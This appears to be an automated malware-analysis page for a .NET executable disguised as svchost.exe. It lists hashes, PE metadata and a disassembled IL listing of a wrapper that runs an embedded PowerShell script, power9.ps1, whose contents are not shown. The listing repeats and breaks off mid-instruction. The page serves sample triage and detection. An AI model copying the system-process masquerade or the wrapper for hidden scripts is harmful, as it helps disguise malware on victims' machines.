3317bedd596b80004b8a06aaf63c912e
PE Executable | MD5: 3317bedd596b80004b8a06aaf63c912e | Size: 57.36 KB | application/x-dosexec
Symbol Ofbuscation Score
|
Hash | Hash Value |
|---|---|
| MD5 | 3317bedd596b80004b8a06aaf63c912e
|
| Sha1 | 2d40131c482134ace92ff17e8c9da92982a7d072
|
| Sha256 | 5547cc6bbfe72cb4afdff0cdf9aff7a1e36ff77c43682e2e49fca137c86a163d
|
| Sha384 | c41d0dbcf2d459d97c61eb59890ae171ca50f242bf24898dfeae2085119a7a562dc8425172460b68db9383b96fe759d2
|
| Sha512 | 32716cb27a334905c1ebeccf16718a0b91fa2680bc9cda61bd2d68e72ead09ffc64570faaa2f1bb19dfbc1ffaf24f12469ed1e1645f477a0f72c7732457e1f3b
|
| SSDeep | 768:omQZqx1lYcTYbFiAnSaPWdgwWIjUq1fzu4AOXbYC1XkUt:o0lY4exPWdR/Rh7buUt
|
| TLSH | C5432918675CC62ED67F0E7EA4521A1066B697761203CBC63D8C24FEBEE3304872179B
|
PeID
|
Name0 | Value |
|---|---|
| Info | PE Detect: PeReader FAIL, AsmResolver Mapped OK |
| Info | Remap: Mapped -> FileLayout (RAM only) as [Rebuild from dump]_fc09bf1c.exe |
| Module Name | svchost.exe |
| Full Name | svchost.exe |
| EntryPoint | System.Int32 ModuleNameSpace.MainApp::Main(System.String[]) |
| Scope Name | svchost.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | svchost |
| Assembly Version | 0.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 88 |
| Main Method | System.Int32 ModuleNameSpace.MainApp::Main(System.String[]) |
| Main IL Instruction Count | 535 |
| Main IL | ldnull <null> stloc.s V_24 ldnull <null> stloc.s V_25 ldnull <null> stloc.s V_26 newobj System.Void ModuleNameSpace.MainApp/<>c__DisplayClass6::.ctor() stloc.s V_27 call System.Void System.Windows.Forms.Application::EnableVisualStyles() newobj System.Void ModuleNameSpace.MainApp::.ctor() stloc.0 <null> ldc.i4.0 <null> stloc.1 <null> ldsfld System.String System.String::Empty stloc.2 <null> ldloc.s V_27 newobj System.Void ModuleNameSpace.MainModuleUI::.ctor() stfld ModuleNameSpace.MainModuleUI ModuleNameSpace.MainApp/<>c__DisplayClass6::ui ldloc.0 <null> ldloc.s V_27 ldfld ModuleNameSpace.MainModuleUI ModuleNameSpace.MainApp/<>c__DisplayClass6::ui newobj System.Void ModuleNameSpace.MainModule::.ctor(ModuleNameSpace.MainAppInterface,ModuleNameSpace.MainModuleUI) stloc.3 <null> ldloc.s V_27 ldc.i4.0 <null> newobj System.Void System.Threading.ManualResetEvent::.ctor(System.Boolean) stfld System.Threading.ManualResetEvent ModuleNameSpace.MainApp/<>c__DisplayClass6::mre call System.AppDomain System.AppDomain::get_CurrentDomain() ldnull <null> ldftn System.Void ModuleNameSpace.MainApp::CurrentDomain_UnhandledException(System.Object,System.UnhandledExceptionEventArgs) newobj System.Void System.UnhandledExceptionEventHandler::.ctor(System.Object,System.IntPtr) callvirt System.Void System.AppDomain::add_UnhandledException(System.UnhandledExceptionEventHandler) ldloc.3 <null> call System.Management.Automation.Runspaces.Runspace System.Management.Automation.Runspaces.RunspaceFactory::CreateRunspace(System.Management.Automation.Host.PSHost) stloc.s V_4 ldloc.s V_4 ldc.i4.0 <null> callvirt System.Void System.Management.Automation.Runspaces.Runspace::set_ApartmentState(System.Threading.ApartmentState) ldloc.s V_4 callvirt System.Void System.Management.Automation.Runspaces.Runspace::Open() call System.Management.Automation.PowerShell System.Management.Automation.PowerShell::Create() stloc.s V_5 ldloc.s V_5 ldloc.s V_4 callvirt System.Void System.Management.Automation.PowerShell::set_Runspace(System.Management.Automation.Runspaces.Runspace) ldloc.s V_5 callvirt System.Management.Automation.PSDataStreams System.Management.Automation.PowerShell::get_Streams() callvirt System.Management.Automation.PSDataCollection`1<System.Management.Automation.ErrorRecord> System.Management.Automation.PSDataStreams::get_Error() ldloc.s V_24 brtrue.s IL_00A6: ldloc.s V_24 ldloc.s V_27 ldftn System.Void ModuleNameSpace.MainApp/<>c__DisplayClass6::<Main>b__0(System.Object,System.Management.Automation.DataAddedEventArgs) newobj System.Void System.EventHandler`1<System.Management.Automation.DataAddedEventArgs>::.ctor(System.Object,System.IntPtr) stloc.s V_24 ldloc.s V_24 callvirt System.Void System.Management.Automation.PSDataCollection`1<System.Management.Automation.ErrorRecord>::add_DataAdded(System.EventHandler`1<System.Management.Automation.DataAddedEventArgs>) newobj System.Void System.Management.Automation.PSDataCollection`1<System.String>::.ctor() stloc.s V_6 call System.Boolean System.Console::get_IsInputRedirected() brfalse.s IL_00D7: ldloc.s V_6 ldstr stloc.s V_7 br.s IL_00CD: call System.String System.Console::ReadLine() ldloc.s V_6 ldloc.s V_7 callvirt System.Void System.Management.Automation.PSDataCollection`1<System.String>::Add(System.String) call System.String System.Console::ReadLine() dup <null> stloc.s V_7 brtrue.s IL_00C4: ldloc.s V_6 ldloc.s V_6 callvirt System.Void System.Management.Automation.PSDataCollection`1<System.String>::Complete() newobj System.Void System.Management.Automation.PSDataCollection`1<System.Management.Automation.PSObject>::.ctor() stloc.s V_8 ldloc.s V_8 ldloc.s V_25 brtrue.s IL_00FA: ldloc.s V_25 ldloc.s V_27 ldftn System.Void ModuleNameSpace.MainApp/<>c__DisplayClass6::<Main>b__1(System.Object,System.Management.Automation.DataAddedEventArgs) newobj System.Void System.EventHandler`1<System.Management.Automation.DataAddedEventArgs>::.ctor(System.Object,System.IntPtr) stloc.s V_25 ldloc.s V_25 callvirt System.Void System.Management.Automation.PSDataCollection`1<System.Management.Automation.PSObject>::add_DataAdded(System.EventHandler`1<System.Management.Automation.DataAddedEventArgs>) ldc.i4.0 <null> stloc.s V_9 ldc.i4.0 <null> stloc.s V_10 ldc.i4.0 <null> stloc.s V_11 ldstr stloc.s V_12 ldarg.0 <null> stloc.s V_29 ldc.i4.0 <null> stloc.s V_30 br IL_022E: ldloc.s V_30 ldloc.s V_29 ldloc.s V_30 ldelem.ref <null> stloc.s V_13 ldloc.s V_13 ldstr -wait ldc.i4.1 <null> call System.Int32 System.String::Compare(System.String,System.String,System.Boolean) brtrue.s IL_0139: ldloc.s V_13 ldc.i4.1 <null> stloc.1 <null> br IL_0222: ldloc.s V_10 ldloc.s V_13 ldstr -extract ldc.i4.3 <null> callvirt System.Boolean System.String::StartsWith(System.String,System.StringComparison) brfalse.s IL_01A9: ldloc.s V_13 ldloc.s V_13 ldc.i4.1 <null> newarr System.String stloc.s V_31 ldloc.s V_31 ldc.i4.0 <null> ldstr : stelem.ref <null> ldloc.s V_31 ldc.i4.2 <null> ldc.i4.1 <null> callvirt System.String[] System.String::Split(System.String[],System.Int32,System.StringSplitOptions) stloc.s V_14 ldloc.s V_14 ldlen <null> conv.i4 <null> ldc.i4.2 <null> beq.s IL_018D: ldloc.s V_14 ldstr If you specify the -extract option you need to add a file for extraction in this way -extract:"<filename>" call System.AppDomain System.AppDomain::get_CurrentDomain() callvirt System.String System.AppDomain::get_FriendlyName() ldc.i4.0 <null> ldc.i4.s 16 call System.Windows.Forms.DialogResult System.Windows.Forms.MessageBox::Show(System.String,System.String,System.Windows.Forms.MessageBoxButtons,System.Windows.Forms.MessageBoxIcon) pop <null> ldc.i4.1 <null> stloc.s V_28 leave IL_05CA: ldloc.s V_28 ldloc.s V_14 ldc.i4.1 <null> ldelem.ref <null> ldc.i4.1 <null> newarr System.Char stloc.s V_32 ldloc.s V_32 ldc.i4.0 <null> ldc.i4.s 34 stelem.i2 <null> ldloc.s V_32 callvirt System.String System.String::Trim(System.Char[]) stloc.2 <null> br.s IL_0222: ldloc.s V_10 ldloc.s V_13 ldstr -end ldc.i4.1 <null> call System.Int32 System.String::Compare(System.String,System.String,System.Boolean) brtrue.s IL_01C0: ldloc.s V_13 ldloc.s V_10 ldc.i4.1 <null> add <null> stloc.s V_9 br.s IL_0239: call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() ldloc.s V_13 ldstr -? ldc.i4.1 <null> call System.Int32 System.String::Compare(System.String,System.String,System.Boolean) brtrue.s IL_01D4: ldloc.s V_11 ldc.i4.1 <null> stloc.s V_11 br.s IL_0222: ldloc.s V_10 ldloc.s V_11 brfalse.s IL_020B: ldloc.s V_13 ldloc.s V_13 ldstr -detailed ldc.i4.1 <null> call System.Int32 System.String::Compare(System.String,System.String,System.Boolean) brfalse.s IL_0205: ldloc.s V_13 ldloc.s V_13 ldstr -examples ldc.i4.1 <null> call System.Int32 System.String::Compare(System.String,System.String,System.Boolean) brfalse.s IL_0205: ldloc.s V_13 ldloc.s V_13 ldstr -full ldc.i4.1 <null> call System.Int32 System.String::Compare(System.String,System.String,System.Boolean) brtrue.s IL_0222: ldloc.s V_10 ldloc.s V_13 stloc.s V_12 br.s IL_0222: ldloc.s V_10 ldloc.s V_13 ldstr -debug ldc.i4.1 <null> call System.Int32 System.String::Compare(System.String,System.String,System.Boolean) brtrue.s IL_0222: ldloc.s V_10 call System.Boolean System.Diagnostics.Debugger::Launch() pop <null> br.s IL_0239: call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() ldloc.s V_10 ldc.i4.1 <null> add <null> stloc.s V_10 ldloc.s V_30 ldc.i4.1 <null> add <null> stloc.s V_30 ldloc.s V_30 ldloc.s V_29 ldlen <null> conv.i4 <null> blt IL_011C: ldloc.s V_29 call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() stloc.s V_15 ldloc.s V_15 ldstr power9.ps1 callvirt System.IO.Stream System.Reflection.Assembly::GetManifestResourceStream(System.String) stloc.s V_16 ldloc.s V_16 call System.Text.Encoding System.Text.Encoding::get_UTF8() newobj System.Void System.IO.StreamReader::.ctor(System.IO.Stream,System.Text.Encoding) stloc.s V_17 ldloc.s V_17 callvirt System.String System.IO.TextReader::ReadToEnd() stloc.s V_18 ldloc.2 <null> call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_027D: ldloc.s V_11 ldloc.2 <null> ldloc.s V_18 call System.Void System.IO.File::WriteAllText(System.String,System.String) ldc.i4.0 <null> stloc.s V_28 leave IL_05CA: ldloc.s V_28 ldloc.s V_11 brfalse.s IL_02F0: ldloc.s V_5 ldloc.s V_5 ldc.i4.s 9 newarr System.String stloc.s V_33 ldloc.s V_33 ldc.i4.0 <null> ldstr function stelem.ref <null> ldloc.s V_33 ldc.i4.1 <null> call System.AppDomain System.AppDomain::get_CurrentDomain() callvirt System.String System.AppDomain::get_FriendlyName() stelem.ref <null> ldloc.s V_33 ldc.i4.2 <null> ldstr { stelem.ref <null> ldloc.s V_33 ldc.i4.3 <null> ldloc.s V_18 stelem.ref <null> ldloc.s V_33 ldc.i4.4 <null> ldstr }; Get-Help stelem.ref <null> ldloc.s V_33 ldc.i4.5 <null> call System.AppDomain System.AppDomain::get_CurrentDomain() callvirt System.String System.AppDomain::get_FriendlyName() stelem.ref <null> ldloc.s V_33 ldc.i4.6 <null> ldstr stelem.ref <null> ldloc.s V_33 ldc.i4.7 <null> ldloc.s V_12 stelem.ref <null> ldloc.s V_33 ldc.i4.8 <null> ldstr | Out-String stelem.ref <null> ldloc.s V_33 call System.String System.String::Concat(System.String[]) callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddScript(System.String) pop <null> br.s IL_02FA: leave.s IL_0308 ldloc.s V_5 ldloc.s V_18 callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddScript(System.String) pop <null> leave.s IL_0308: leave.s IL_0316 ldloc.s V_17 brfalse.s IL_0307: endfinally ldloc.s V_17 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_0316: ldloc.s V_11 ldloc.s V_16 brfalse.s IL_0315: endfinally ldloc.s V_16 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_11 brtrue IL_0515: ldloc.s V_5 ldnull <null> stloc.s V_19 ldstr ^-([^: ]+)[ :]?([^:]*)$ newobj System.Void System.Text.RegularExpressions.Regex::.ctor(System.String) stloc.s V_20 ldloc.s V_9 stloc.s V_21 br IL_04E3: ldloc.s V_21 ldloc.s V_20 ldarg.0 <null> ldloc.s V_21 ldelem.ref <null> callvirt System.Text.RegularExpressions.Match System.Text.RegularExpressions.Regex::Match(System.String) stloc.s V_22 ldloc.s V_22 callvirt System.Boolean System.Text.RegularExpressions.Group::get_Success() brfalse IL_04BA: ldloc.s V_19 ldloc.s V_22 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() callvirt System.Int32 System.Text.RegularExpressions.GroupCollection::get_Count() ldc.i4.3 <null> bne.un IL_04BA: ldloc.s V_19 ldarg.0 <null> ldloc.s V_21 ldelem.ref <null> ldloca.s V_23 call System.Boolean System.Double::TryParse(System.String,System.Double&) brtrue IL_04BA: ldloc.s V_19 ldloc.s V_19 brfalse.s IL_037E: ldloc.s V_22 ldloc.s V_5 ldloc.s V_19 callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddParameter(System.String) pop <null> ldloc.s V_22 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.2 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() callvirt System.String System.String::Trim() ldstr call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_03BA: ldloc.s V_22 ldloc.s V_22 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.1 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() stloc.s V_19 br IL_04DD: ldloc.s V_21 ldloc.s V_22 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.2 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_03FB: ldloc.s V_5 ldloc.s V_22 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.2 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() callvirt System.String System.String::ToUpper() ldstr $TRUE call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_0423: ldloc.s V_22 ldloc.s V_5 ldloc.s V_22 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.1 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() ldc.i4.1 <null> box System.Boolean callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddParameter(System.String,System.Object) pop <null> ldnull <null> stloc.s V_19 br IL_04DD: ldloc.s V_21 ldloc.s V_22 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.2 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() ldstr False call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_0464: ldloc.s V_5 ldloc.s V_22 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.2 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() callvirt System.String System.String::ToUpper() ldstr $FALSE call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_0489: ldloc.s V_5 ldloc.s V_5 ldloc.s V_22 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.1 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() ldc.i4.0 <null> box System.Boolean callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddParameter(System.String,System.Object) pop <null> ldnull <null> stloc.s V_19 br.s IL_04DD: ldloc.s V_21 ldloc.s V_5 ldloc.s V_22 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.1 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() ldloc.s V_22 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.2 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddParameter(System.String,System.Object) pop <null> ldnull <null> stloc.s V_19 br.s IL_04DD: ldloc.s V_21 ldloc.s V_19 brfalse.s IL_04D1: ldloc.s V_5 ldloc.s V_5 ldloc.s V_19 ldarg.0 <null> ldloc.s V_21 ldelem.ref <null> callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddParameter(System.String,System.Object) pop <null> ldnull <null> stloc.s V_19 br.s IL_04DD: ldloc.s V_21 ldloc.s V_5 ldarg.0 <null> ldloc.s V_21 ldelem.ref <null> callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddArgument(System.Object) pop <null> ldloc.s V_21 ldc.i4.1 <null> add <null> stloc.s V_21 ldloc.s V_21 ldarg.0 <null> ldlen <null> conv.i4 <null> blt IL_0335: ldloc.s V_20 ldloc.s V_19 brfalse.s IL_04FB: ldloc.s V_5 ldloc.s V_5 ldloc.s V_19 callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddParameter(System.String) pop <null> ldloc.s V_5 ldstr Out-String callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddCommand(System.String) pop <null> ldloc.s V_5 ldstr Stream callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddParameter(System.String) pop <null> ldloc.s V_5 ldloc.s V_6 ldloc.s V_8 ldnull <null> ldloc.s V_26 brtrue.s IL_052F: ldloc.s V_26 ldloc.s V_27 ldftn System.Void ModuleNameSpace.MainApp/<>c__DisplayClass6::<Main>b__2(System.IAsyncResult) newobj System.Void System.AsyncCallback::.ctor(System.Object,System.IntPtr) stloc.s V_26 ldloc.s V_26 ldnull <null> callvirt System.IAsyncResult System.Management.Automation.PowerShell::BeginInvoke<System.String,System.Management.Automation.PSObject>(System.Management.Automation.PSDataCollection`1<System.String>,System.Management.Automation.PSDataCollection`1<System.Management.Automation.PSObject>,System.Management.Automation.PSInvocationSettings,System.AsyncCallback,System.Object) pop <null> ldloc.0 <null> callvirt System.Boolean ModuleNameSpace.MainApp::get_ShouldExit() brtrue.s IL_0550: ldloc.s V_5 ldloc.s V_27 ldfld System.Threading.ManualResetEvent ModuleNameSpace.MainApp/<>c__DisplayClass6::mre ldc.i4.s 100 callvirt System.Boolean System.Threading.WaitHandle::WaitOne(System.Int32) brfalse.s IL_0538: ldloc.0 ldloc.s V_5 callvirt System.Void System.Management.Automation.PowerShell::Stop() ldloc.s V_5 callvirt System.Management.Automation.PSInvocationStateInfo System.Management.Automation.PowerShell::get_InvocationStateInfo() callvirt System.Management.Automation.PSInvocationState System.Management.Automation.PSInvocationStateInfo::get_State() ldc.i4.5 <null> bne.un.s IL_0583: leave.s IL_0591 ldloc.s V_27 ldfld ModuleNameSpace.MainModuleUI ModuleNameSpace.MainApp/<>c__DisplayClass6::ui ldloc.s V_5 callvirt System.Management.Automation.PSInvocationStateInfo System.Management.Automation.PowerShell::get_InvocationStateInfo() callvirt System.Exception System.Management.Automation.PSInvocationStateInfo::get_Reason() callvirt System.String System.Exception::get_Message() callvirt System.Void System.Management.Automation.Host.PSHostUserInterface::WriteErrorLine(System.String) leave.s IL_0591: ldloc.s V_4 ldloc.s V_5 brfalse.s IL_0590: endfinally ldloc.s V_5 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_4 callvirt System.Void System.Management.Automation.Runspaces.Runspace::Close() leave.s IL_05A6: leave.s IL_05AB ldloc.s V_4 brfalse.s IL_05A5: endfinally ldloc.s V_4 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_05AB: ldloc.1 pop <null> leave.s IL_05AB: ldloc.1 ldloc.1 <null> brfalse.s IL_05C3: ldloc.0 ldstr Click OK to exit... call System.AppDomain System.AppDomain::get_CurrentDomain() callvirt System.String System.AppDomain::get_FriendlyName() call System.Windows.Forms.DialogResult System.Windows.Forms.MessageBox::Show(System.String,System.String) pop <null> ldloc.0 <null> callvirt System.Int32 ModuleNameSpace.MainApp::get_ExitCode() ret <null> ldloc.s V_28 ret <null> |
| Module Name | svchost.exe |
| Full Name | svchost.exe |
| EntryPoint | System.Int32 ModuleNameSpace.MainApp::Main(System.String[]) |
| Scope Name | svchost.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | svchost |
| Assembly Version | 0.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 88 |
| Main Method | System.Int32 ModuleNameSpace.MainApp::Main(System.String[]) |
| Main IL Instruction Count | 535 |
| Main IL | ldnull <null> stloc.s V_24 ldnull <null> stloc.s V_25 ldnull <null> stloc.s V_26 newobj System.Void ModuleNameSpace.MainApp/<>c__DisplayClass6::.ctor() stloc.s V_27 call System.Void System.Windows.Forms.Application::EnableVisualStyles() newobj System.Void ModuleNameSpace.MainApp::.ctor() stloc.0 <null> ldc.i4.0 <null> stloc.1 <null> ldsfld System.String System.String::Empty stloc.2 <null> ldloc.s V_27 newobj System.Void ModuleNameSpace.MainModuleUI::.ctor() stfld ModuleNameSpace.MainModuleUI ModuleNameSpace.MainApp/<>c__DisplayClass6::ui ldloc.0 <null> ldloc.s V_27 ldfld ModuleNameSpace.MainModuleUI ModuleNameSpace.MainApp/<>c__DisplayClass6::ui newobj System.Void ModuleNameSpace.MainModule::.ctor(ModuleNameSpace.MainAppInterface,ModuleNameSpace.MainModuleUI) stloc.3 <null> ldloc.s V_27 ldc.i4.0 <null> newobj System.Void System.Threading.ManualResetEvent::.ctor(System.Boolean) stfld System.Threading.ManualResetEvent ModuleNameSpace.MainApp/<>c__DisplayClass6::mre call System.AppDomain System.AppDomain::get_CurrentDomain() ldnull <null> ldftn System.Void ModuleNameSpace.MainApp::CurrentDomain_UnhandledException(System.Object,System.UnhandledExceptionEventArgs) newobj System.Void System.UnhandledExceptionEventHandler::.ctor(System.Object,System.IntPtr) callvirt System.Void System.AppDomain::add_UnhandledException(System.UnhandledExceptionEventHandler) ldloc.3 <null> call System.Management.Automation.Runspaces.Runspace System.Management.Automation.Runspaces.RunspaceFactory::CreateRunspace(System.Management.Automation.Host.PSHost) stloc.s V_4 ldloc.s V_4 ldc.i4.0 <null> callvirt System.Void System.Management.Automation.Runspaces.Runspace::set_ApartmentState(System.Threading.ApartmentState) ldloc.s V_4 callvirt System.Void System.Management.Automation.Runspaces.Runspace::Open() call System.Management.Automation.PowerShell System.Management.Automation.PowerShell::Create() stloc.s V_5 ldloc.s V_5 ldloc.s V_4 callvirt System.Void System.Management.Automation.PowerShell::set_Runspace(System.Management.Automation.Runspaces.Runspace) ldloc.s V_5 callvirt System.Management.Automation.PSDataStreams System.Management.Automation.PowerShell::get_Streams() callvirt System.Management.Automation.PSDataCollection`1<System.Management.Automation.ErrorRecord> System.Management.Automation.PSDataStreams::get_Error() ldloc.s V_24 brtrue.s IL_00A6: ldloc.s V_24 ldloc.s V_27 ldftn System.Void ModuleNameSpace.MainApp/<>c__DisplayClass6::<Main>b__0(System.Object,System.Management.Automation.DataAddedEventArgs) newobj System.Void System.EventHandler`1<System.Management.Automation.DataAddedEventArgs>::.ctor(System.Object,System.IntPtr) stloc.s V_24 ldloc.s V_24 callvirt System.Void System.Management.Automation.PSDataCollection`1<System.Management.Automation.ErrorRecord>::add_DataAdded(System.EventHandler`1<System.Management.Automation.DataAddedEventArgs>) newobj System.Void System.Management.Automation.PSDataCollection`1<System.String>::.ctor() stloc.s V_6 call System.Boolean System.Console::get_IsInputRedirected() brfalse.s IL_00D7: ldloc.s V_6 ldstr stloc.s V_7 br.s IL_00CD: call System.String System.Console::ReadLine() ldloc.s V_6 ldloc.s V_7 callvirt System.Void System.Management.Automation.PSDataCollection`1<System.String>::Add(System.String) call System.String System.Console::ReadLine() dup <null> stloc.s V_7 brtrue.s IL_00C4: ldloc.s V_6 ldloc.s V_6 callvirt System.Void System.Management.Automation.PSDataCollection`1<System.String>::Complete() newobj System.Void System.Management.Automation.PSDataCollection`1<System.Management.Automation.PSObject>::.ctor() stloc.s V_8 ldloc.s V_8 ldloc.s V_25 brtrue.s IL_00FA: ldloc.s V_25 ldloc.s V_27 ldftn System.Void ModuleNameSpace.MainApp/<>c__DisplayClass6::<Main>b__1(System.Object,System.Management.Automation.DataAddedEventArgs) newobj System.Void System.EventHandler`1<System.Management.Automation.DataAddedEventArgs>::.ctor(System.Object,System.IntPtr) stloc.s V_25 ldloc.s V_25 callvirt System.Void System.Management.Automation.PSDataCollection`1<System.Management.Automation.PSObject>::add_DataAdded(System.EventHandler`1<System.Management.Automation.DataAddedEventArgs>) ldc.i4.0 <null> stloc.s V_9 ldc.i4.0 <null> stloc.s V_10 ldc.i4.0 <null> stloc.s V_11 ldstr stloc.s V_12 ldarg.0 <null> stloc.s V_29 ldc.i4.0 <null> stloc.s V_30 br IL_022E: ldloc.s V_30 ldloc.s V_29 ldloc.s V_30 ldelem.ref <null> stloc.s V_13 ldloc.s V_13 ldstr -wait ldc.i4.1 <null> call System.Int32 System.String::Compare(System.String,System.String,System.Boolean) brtrue.s IL_0139: ldloc.s V_13 ldc.i4.1 <null> stloc.1 <null> br IL_0222: ldloc.s V_10 ldloc.s V_13 ldstr -extract ldc.i4.3 <null> callvirt System.Boolean System.String::StartsWith(System.String,System.StringComparison) brfalse.s IL_01A9: ldloc.s V_13 ldloc.s V_13 ldc.i4.1 <null> newarr System.String stloc.s V_31 ldloc.s V_31 ldc.i4.0 <null> ldstr : stelem.ref <null> ldloc.s V_31 ldc.i4.2 <null> ldc.i4.1 <null> callvirt System.String[] System.String::Split(System.String[],System.Int32,System.StringSplitOptions) stloc.s V_14 ldloc.s V_14 ldlen <null> conv.i4 <null> ldc.i4.2 <null> beq.s IL_018D: ldloc.s V_14 ldstr If you specify the -extract option you need to add a file for extraction in this way -extract:"<filename>" call System.AppDomain System.AppDomain::get_CurrentDomain() callvirt System.String System.AppDomain::get_FriendlyName() ldc.i4.0 <null> ldc.i4.s 16 call System.Windows.Forms.DialogResult System.Windows.Forms.MessageBox::Show(System.String,System.String,System.Windows.Forms.MessageBoxButtons,System.Windows.Forms.MessageBoxIcon) pop <null> ldc.i4.1 <null> stloc.s V_28 leave IL_05CA: ldloc.s V_28 ldloc.s V_14 ldc.i4.1 <null> ldelem.ref <null> ldc.i4.1 <null> newarr System.Char stloc.s V_32 ldloc.s V_32 ldc.i4.0 <null> ldc.i4.s 34 stelem.i2 <null> ldloc.s V_32 callvirt System.String System.String::Trim(System.Char[]) stloc.2 <null> br.s IL_0222: ldloc.s V_10 ldloc.s V_13 ldstr -end ldc.i4.1 <null> call System.Int32 System.String::Compare(System.String,System.String,System.Boolean) brtrue.s IL_01C0: ldloc.s V_13 ldloc.s V_10 ldc.i4.1 <null> add <null> stloc.s V_9 br.s IL_0239: call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() ldloc.s V_13 ldstr -? ldc.i4.1 <null> call System.Int32 System.String::Compare(System.String,System.String,System.Boolean) brtrue.s IL_01D4: ldloc.s V_11 ldc.i4.1 <null> stloc.s V_11 br.s IL_0222: ldloc.s V_10 ldloc.s V_11 brfalse.s IL_020B: ldloc.s V_13 ldloc.s V_13 ldstr -detailed ldc.i4.1 <null> call System.Int32 System.String::Compare(System.String,System.String,System.Boolean) brfalse.s IL_0205: ldloc.s V_13 ldloc.s V_13 ldstr -examples ldc.i4.1 <null> call System.Int32 System.String::Compare(System.String,System.String,System.Boolean) brfalse.s IL_0205: ldloc.s V_13 ldloc.s V_13 ldstr -full ldc.i4.1 <null> call System.Int32 System.String::Compare(System.String,System.String,System.Boolean) brtrue.s IL_0222: ldloc.s V_10 ldloc.s V_13 stloc.s V_12 br.s IL_0222: ldloc.s V_10 ldloc.s V_13 ldstr -debug ldc.i4.1 <null> call System.Int32 System.String::Compare(System.String,System.String,System.Boolean) brtrue.s IL_0222: ldloc.s V_10 call System.Boolean System.Diagnostics.Debugger::Launch() pop <null> br.s IL_0239: call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() ldloc.s V_10 ldc.i4.1 <null> add <null> stloc.s V_10 ldloc.s V_30 ldc.i4.1 <null> add <null> stloc.s V_30 ldloc.s V_30 ldloc.s V_29 ldlen <null> conv.i4 <null> blt IL_011C: ldloc.s V_29 call System.Reflection.Assembly 